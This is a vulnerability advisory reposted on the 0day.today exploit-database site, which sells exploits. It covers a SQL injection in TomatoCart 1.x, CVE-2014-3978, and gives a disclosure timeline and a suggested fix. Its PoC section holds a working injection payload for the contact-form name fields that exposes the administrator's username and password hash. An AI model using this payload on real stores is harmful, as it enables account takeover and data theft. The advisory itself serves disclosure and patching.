0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

TomatoCart 1.x - SQL Injection Vulnerability

Author

Breaking.Technology

Risk

[

Security Risk High

]

0day-ID

Category

Date add

CVE

Platform

Title:
    TomatoCart v1.x (latest-stable) Remote SQL Injection Vulnerability
 
Background:
    TomatoCart is open source ecommerce solution developed and maintained by a number of 64,000+ users from 50+ countries and regions. It's distributed under the terms of the GNU General Public License (or "GPL"), free to download and share. The community, including project founders and other developers, are supposed to work together on the platform of TomatoCart, contributing features, technical support and services. The current stable package is TomatoCart V1.1.8.6.1, while the latest development version is version 2.0 Alpha 4.  This exploit affects the "stable" tree.
 
Timeline:
    06 June 2014   - CVE-2014-3978 assigned
    06 June 2014   - Submitted to vendor
    25 June 2014   - Received inadequate patch from vendor
    26 June 2014   - Suggested patch sent to vendor
    17 July 2014   - Request for update from vendor, no response.
    05 August 2014 - Pull request sent on github for full patch
 
Status:
    Vendor ignored, see suggested fix below.
 
Released:
    05 August 2014 - https://breaking.technology/advisories/CVE-2014-3978.txt
 
Classification:
    SQL Injection
 
Exploit Complexity:
    Low
 
Severity:
    High
 
Description:
    TomatoCart suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection.
 
    Required Information:
    * Valid user account
 
PoC:
    Create a new contact in your address book using the following values.
 
    First name: :entry_lastname,
    Last Name : ,(select user_name from toc_administrators order by id asc limit 1),(select user_password from toc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#
     
    The new contact will be added to your address book with the admin hash as the contact's street address
 
Suggested Action:
    Pull request has been sent to the developers on github. Recommend patching the required to properly encode colon (:)
    https://github.com/tomatocart/TomatoCart-v1/pull/238

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

TomatoCart 1.x - SQL Injection Vulnerability

Report Error

Report Error